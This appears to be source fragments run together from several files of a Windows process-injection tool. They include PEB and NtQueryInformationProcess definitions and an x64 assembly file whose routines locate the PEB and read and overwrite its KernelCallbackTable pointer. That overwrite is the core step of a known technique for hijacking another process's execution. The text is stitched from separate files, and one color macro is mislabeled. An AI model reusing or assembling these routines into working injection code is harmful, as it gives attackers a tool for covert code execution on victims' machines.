ULONG CloudFileDiagFlags; //0x7ac
CHAR PlaceholderCompatibilityMode; //0x7b0
CHAR PlaceholderCompatibilityModeReserved[7]; //0x7b1
struct _LEAP_SECOND_DATA* LeapSecondData; //0x7b8
union
{
ULONG LeapSecondFlags; //0x7c0
struct
{
ULONG SixtySecondEnabled : 1; //0x7c0
ULONG Reserved : 31; //0x7c0
};
};
ULONG NtGlobalFlag2; //0x7c4
} PEB, * PPEB;
typedef LONG KPRIORITY;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PPEB PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef enum _PROCESSINFOCLASS
{
ProcessBasicInformation = 0,
ProcessDebugPort = 7,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessBreakOnTermination = 29
} PROCESSINFOCLASS, * PPROCESSINFOCLASS;
typedef NTSTATUS(WINAPI* PFN_NTQUERYINFORMATIONPROCESS)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
PFN_NTQUERYINFORMATIONPROCESS NtQueryInformationProcess = NULL;
#pragma once
#define COLOR_RESET "\033[0m"
#define COLOR_RED_BOLD "\033[1;31m"
#define COLOR_GREEN_BOLD "\033[1;32m"
#define COLOR_YELLOW_BOLD "\033[1;32m"
#define COLOR_BLUE_BOLD "\033[1;34m"
extern PVOID LocatePEB();
extern PVOID ResolveKernelCallbackTable(PVOID PebAddress);
extern void WriteKernelCallbackTable(PVOID PebAddress, PVOID NewKernelCallbackTable);
#define MAX_WAIT_TIME 10000
.CODE
PUBLIC LocatePEB
PUBLIC ResolveKernelCallbackTable
PUBLIC WriteKernelCallbackTable
; Retrieving the address of the PEB.
LocatePEB PROC
mov rax, qword ptr gs:[60h] ; Access PEB in x64
ret
LocatePEB ENDP
; Retrieving the KernelCallbackTable address from the PEB.
; RCX contains the PEB address, returns KernelCallbackTable address in RAX
ResolveKernelCallbackTable PROC
mov rax, qword ptr [rcx + 58h] ; Offset for KernelCallbackTable in PEB (0x58)
ret
ResolveKernelCallbackTable ENDP
; Updating the KernelCallbackTable with a new address.
; RCX = PEB address, RDX = New KernelCallbackTable address
WriteKernelCallbackTable PROC
mov qword ptr [rcx + 58h], rdx ; Write the new KernelCallbackTable address
ret
WriteKernelCallbackTable ENDP
END